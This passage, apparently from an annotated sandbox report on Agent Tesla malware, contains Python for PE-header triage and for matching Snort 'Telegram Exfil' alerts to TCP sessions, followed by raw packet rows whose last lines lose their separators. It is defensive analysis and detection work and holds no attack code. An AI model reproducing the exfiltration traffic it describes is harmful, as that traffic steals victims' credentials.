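    pe = struct.unpack_from("<I", blob, 0x3C)[0]  # e_lfanew
    if blob[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", blob, pe + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", blob, pe + 20)[0]   # COFF SizeOfOptionalHeader
    opt = pe + 24
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == 0x10B:        # PE32: NumberOfRvaAndSizes at 92, directories at 96
        ndirs_off, dirs_off = 92, 96
    elif magic == 0x20B:      # PE32+: 16 bytes later because of the 64-bit fields
        ndirs_off, dirs_off = 108, 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs = struct.unpack_from("<I", blob, opt + ndirs_off)[0]
    dirs = {DIRECTORY_NAMES[i]: struct.unpack_from("<II", blob, opt + dirs_off + 8 * i)
            for i in range(min(ndirs, 16))}
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", blob, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "chars": chars, "entropy": shannon_entropy(blob[rawptr:rawptr + rawsize])})
    return {"dirs": dirs, "sections": sections}

def triage(pe: dict) -> list:
    """The findings a reviewer draws from the two tables above."""
    findings = []
    if pe["dirs"]["COM_DESCRIPTOR"][1]:
        findings.append("managed .NET image: COM_DESCRIPTOR (CLR header) present")
    if pe["dirs"]["SECURITY"][1] == 0:
        findings.append("unsigned: SECURITY (Authenticode) directory empty")
    for s in pe["sections"]:
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["entropy"] > PACKED_ENTROPY:
            findings.append("%s: executable section with entropy %.2f, packed or encrypted payload likely"
                            % (s["name"], s["entropy"]))
    return findings

def _filler(n: int, seed: int) -> bytes:
    """Deterministic pseudo-random bytes standing in for an encrypted payload (constructed)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))

def build_sample_pe() -> bytes:
    """Constructed PE32 image carrying the report's directory and section values."""
    dirs = [(0, 0)] * 16
    dirs[1], dirs[2], dirs[5] = (0xAC4B0, 0x4B), (0xAE000, 0x1600), (0xB0000, 0xC)  # IMPORT, RESOURCE, BASERELOC
    dirs[12], dirs[14] = (0x2000, 0x8), (0x2008, 0x48)  # IAT (one slot: mscoree!_CorExeMain), CLR header
    sections = [  # name, virtual address, virtual size, constructed body, characteristics
        (b".text", 0x2000, 0xAA504, _filler(0x1000, 7), 0x60000020),
        (b".rsrc", 0xAE000, 0x1600, b"VS_VERSION_INFO\0" * 32, 0x40000040),
        (b".reloc", 0xB0000, 0xC, struct.pack("<II", 0x2000, 0xC).ljust(0x200, b"\0"), 0x42000040),
    ]
    dos = (b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<H", 0x10B).ljust(92, b"\0") + struct.pack("<I", 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    headers, data, raw_ptr = b"", b"", 0x200
    for name, va, vsize, body, chars in sections:
        headers += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(body), raw_ptr, 0, 0, 0, 0, chars)
        data, raw_ptr = data + body, raw_ptr + len(body)
    return (dos + b"PE\0\0" + coff + opt + headers).ljust(0x200, b"\0") + data

if __name__ == "__main__":
    image = parse_pe(build_sample_pe())
    for f in triage(image):
        print("-", f)
```

On a real file, replace build_sample_pe() with the file's bytes; the parser branches on the optional-header magic so PE32+ images read the same way. The entropy heuristic only fires on sections marked executable, which is why the .rsrc data here (entropy 6.5 in the report) is not reported as packed.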
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/19/24-19:33:10.146400 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49708 | 443 | 192.168.2.5 | 149.154.167.220
04/19/24-19:33:06.739874 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49706 | 443 | 192.168.2.5 | 149.154.167.220
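The two ETPRO alerts cover only two of the sessions to 149.154.167.220 that the TCP table records; the later sessions from ports 49717 through 49722 reach the same server without a signature hit. The Python below is an added example, not part of the Joe Sandbox report: it parses alert and packet rows in the '|'-separated layout used on this page, collapses packets into client/server sessions, attaches each alert to its session, flags every further session to an alerted server that raised no alert of its own, and measures the gaps between session starts. The rows embedded in it are a trimmed copy of the report's two tables; the session-key rule (the endpoint with the lower port is the server) is an assumption that holds for this capture.

```python
"""Signature-to-flow pivot over the Snort and TCP tables above. Added example,
not part of the Joe Sandbox report. Inputs are '|'-separated rows in the
layout used on this page; the rows below are a trimmed copy of the report's
tables, not a live capture."""
import re
from datetime import datetime, timedelta

SNORT_ALERTS = """
04/19/24-19:33:10.146400 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49708 | 443 | 192.168.2.5 | 149.154.167.220
04/19/24-19:33:06.739874 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49706 | 443 | 192.168.2.5 | 149.154.167.220
"""
TCP_PACKETS = """
Apr 19, 2024 19:33:04.543025017 CEST | 49705 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:04.543060064 CEST | 443 | 49705 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:05.086179972 CEST | 49705 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:05.926769018 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:05.926808119 CEST | 443 | 49706 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:06.739763021 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:07.063458920 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:09.367854118 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:10.146270037 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:10.563536882 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:13.260236979 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:14.916731119 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:34.829293966 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:36.370836020 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
"""
FLOW_TS = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) \w+$")

def _fields(text):
    for line in text.strip().splitlines():
        yield [f.strip() for f in line.split("|")]

def session_key(a_ip, a_port, b_ip, b_port):
    """Canonical (client_ip, client_port, server_ip, server_port). Assumption:
    the endpoint with the lower port is the server, so both directions collapse."""
    if a_port < b_port:
        a_ip, a_port, b_ip, b_port = b_ip, b_port, a_ip, a_port
    return (a_ip, a_port, b_ip, b_port)

def parse_snort(text):
    alerts = []
    for ts, _proto, sid, msg, sport, dport, src, dst in _fields(text):
        alerts.append({"time": datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"),
                       "sid": int(sid), "msg": msg,
                       "key": session_key(src, int(sport), dst, int(dport))})
    return alerts

def parse_flows(text):
    """Group packets into sessions with first/last time and packet counts."""
    sessions = {}
    for ts, sport, dport, src, dst in _fields(text):
        base, frac = FLOW_TS.match(ts).groups()
        # strptime's %f accepts at most six digits; the capture carries nanoseconds
        t = datetime.strptime(base, "%b %d, %Y %H:%M:%S") + timedelta(microseconds=int(frac[:6].ljust(6, "0")))
        key = session_key(src, int(sport), dst, int(dport))
        s = sessions.setdefault(key, {"first": t, "last": t, "packets": 0, "from_client": 0})
        s["first"], s["last"], s["packets"] = min(s["first"], t), max(s["last"], t), s["packets"] + 1
        if (src, int(sport)) == key[:2]:
            s["from_client"] += 1
    return sessions

def correlate(sessions, alerts):
    """Attach alerts to their sessions, then pivot on the alerted servers."""
    by_key = {}
    for a in alerts:
        by_key.setdefault(a["key"], []).append(a)
    bad_servers = {k[2] for k in by_key}
    report = []
    for key, s in sorted(sessions.items(), key=lambda kv: kv[1]["first"]):
        if key in by_key:
            first = min(by_key[key], key=lambda a: a["time"])
            status = "alerted: SID %d %.3fs after first packet" % (
                first["sid"], (first["time"] - s["first"]).total_seconds())
        elif key[2] in bad_servers:
            status = "UNALERTED session to alerted exfil server %s" % key[2]
        else:
            status = "no alert"
        report.append({"key": key, "first": s["first"], "packets": s["packets"],
                       "duration": (s["last"] - s["first"]).total_seconds(), "status": status})
    return report

def beacon_gaps(report, server_ip):
    """Seconds between consecutive session starts to one server (cadence check)."""
    starts = [r["first"] for r in report if r["key"][2] == server_ip]
    return [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]

if __name__ == "__main__":
    rep = correlate(parse_flows(TCP_PACKETS), parse_snort(SNORT_ALERTS))
    for r in rep:
        print("%s %s:%d -> %s:%d  %d pkts  %.2fs  %s" % (
            (r["first"].time(),) + r["key"] + (r["packets"], r["duration"], r["status"])))
    print("gaps to 149.154.167.220:", ["%.1f" % g for g in beacon_gaps(rep, "149.154.167.220")])
```

Both alerts land roughly 0.8 s after the session's first packet, once the TLS handshake is done and the client sends its first application record; the sessions that follow to the same server show the same shape but no alert, so the destination, not the signature, is what to pivot on when scoping the incident. The gaps between session starts (3.4 s, 63.9 s, 21.6 s on this subset) are irregular, so a fixed-interval beacon detector would not have caught them either.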
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2024 19:33:04.543025017 CEST | 49705 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:04.543060064 CEST | 443 | 49705 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:04.543142080 CEST | 49705 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:04.549525023 CEST | 49705 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:04.549540043 CEST | 443 | 49705 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:04.776035070 CEST | 443 | 49705 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:04.776119947 CEST | 49705 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:04.778759003 CEST | 49705 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:04.778769016 CEST | 443 | 49705 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:04.779187918 CEST | 443 | 49705 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:04.833252907 CEST | 49705 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:04.839976072 CEST | 49705 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:04.880157948 CEST | 443 | 49705 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:05.080715895 CEST | 443 | 49705 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:05.080806017 CEST | 443 | 49705 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:05.081012011 CEST | 49705 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:05.086179972 CEST | 49705 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:05.926769018 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:05.926808119 CEST | 443 | 49706 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:05.926922083 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:05.943377018 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:05.943392992 CEST | 443 | 49706 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:06.374706984 CEST | 443 | 49706 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:06.374838114 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:06.379019976 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:06.379031897 CEST | 443 | 49706 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:06.379702091 CEST | 443 | 49706 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:06.381182909 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:06.424124002 CEST | 443 | 49706 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:06.739763021 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:06.739792109 CEST | 443 | 49706 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:06.784132957 CEST | 443 | 49706 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:06.833724976 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:07.060884953 CEST | 443 | 49706 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:07.061027050 CEST | 443 | 49706 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:07.061683893 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:07.063458920 CEST | 49706 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:08.187604904 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:08.187648058 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:08.187719107 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:08.192867041 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:08.192883015 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:08.409291983 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:08.409404039 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:08.410854101 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:08.410876989 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:08.411217928 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:08.458276987 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:08.469510078 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:08.512125015 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:08.728996992 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:08.729065895 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 19:33:08.729173899 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:08.732484102 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 19:33:09.367854118 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:09.367889881 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:09.367966890 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:09.368558884 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:09.368577003 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:09.784562111 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:09.784634113 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:09.786276102 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:09.786286116 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:09.786612034 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:09.790388107 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:09.836112022 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:10.146270037 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:10.146298885 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:10.192652941 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:10.239518881 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:10.562978029 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:10.563059092 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:33:10.563335896 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:33:10.563536882 CEST | 49708 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:13.260236979 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:13.260274887 CEST | 443 | 49717 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:13.260374069 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:13.260674953 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:13.260688066 CEST | 443 | 49717 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:13.682372093 CEST | 443 | 49717 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:13.694485903 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:13.694502115 CEST | 443 | 49717 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:14.052254915 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:14.052282095 CEST | 443 | 49717 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:14.052397966 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:14.052413940 CEST | 443 | 49717 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:14.052550077 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:14.052797079 CEST | 443 | 49717 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:14.091519117 CEST | 443 | 49717 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:14.145720959 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:14.916137934 CEST | 443 | 49717 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:14.916275978 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:14.916295052 CEST | 443 | 49717 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:14.916351080 CEST | 443 | 49717 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:14.916490078 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:14.916731119 CEST | 49717 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:34.829293966 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:34.829355001 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:34.829457998 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:34.829770088 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:34.829788923 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:35.271440029 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:35.281001091 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:35.281018972 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:35.630278111 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:35.630305052 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:35.630372047 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:35.630388021 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:35.630466938 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:35.630584955 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:35.692534924 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:35.739440918 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:36.370181084 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:36.370248079 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:36.370271921 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:36.370285034 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:36.370345116 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:36.370836020 CEST | 49719 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:58.154869080 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:58.154910088 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:58.155055046 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:58.155443907 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:58.155457020 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:58.575258970 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:58.577044010 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:58.577064991 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:58.927206993 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:58.927243948 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:58.927510977 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:58.927531958 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:58.927701950 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:58.927872896 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:58.984690905 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:59.192151070 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:59.192282915 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:59.703977108 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:59.704155922 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:59.704178095 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:59.704243898 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:59.709707022 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:59.709717035 CEST | 443 | 49720 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:34:59.709758043 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:59.709758043 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:34:59.713768959 CEST | 49720 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:07.251101017 CEST | 49721 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:07.251130104 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:07.251246929 CEST | 49721 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:07.253664970 CEST | 49721 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:07.253679991 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:07.682717085 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:07.685795069 CEST | 49721 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:07.685817957 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:08.037132978 CEST | 49721 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:08.037158966 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:08.037236929 CEST | 49721 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:08.037254095 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:08.037329912 CEST | 49721 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:08.037410021 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:08.098397970 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:08.267643929 CEST | 49721 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:09.159316063 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:09.159451962 CEST | 49721 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:09.159466982 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:09.159527063 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:09.159609079 CEST | 49721 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:09.159864902 CEST | 49721 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:10.531157970 CEST | 49722 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:10.531207085 CEST | 443 | 49722 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:10.531285048 CEST | 49722 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:10.531734943 CEST | 49722 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:10.531752110 CEST | 443 | 49722 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:10.949206114 CEST | 443 | 49722 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:10.952275038 CEST | 49722 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:10.952313900 CEST | 443 | 49722 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:11.303700924 CEST | 49722 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:35:11.303726912 CEST | 443 | 49722 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:35:11.308250904 CEST | 49722 | 443 | 192.168.2.5 | 149.154.167.220
                                                                  Apr 19, 2024 19:35:11.308271885 CEST44349722149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:35:11.308521032 CEST49722443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:35:11.308541059 CEST44349722149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:35:11.357254982 CEST44349722149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:35:11.508169889 CEST49722443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:35:12.138283014 CEST44349722149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:35:12.138360023 CEST49722443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:35:12.138391972 CEST44349722149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:35:12.138513088 CEST44349722149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:35:12.138607025 CEST49722443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:35:12.138952971 CEST49722443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:35:16.816417933 CEST49723443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:35:16.816468954 CEST44349723149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:35:16.816543102 CEST49723443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:35:16.816992044 CEST49723443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:35:16.817006111 CEST44349723149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:35:17.227818966 CEST44349723149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:35:17.242537022 CEST49723443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:35:17.242561102 CEST44349723149.154.167.220192.168.2.5
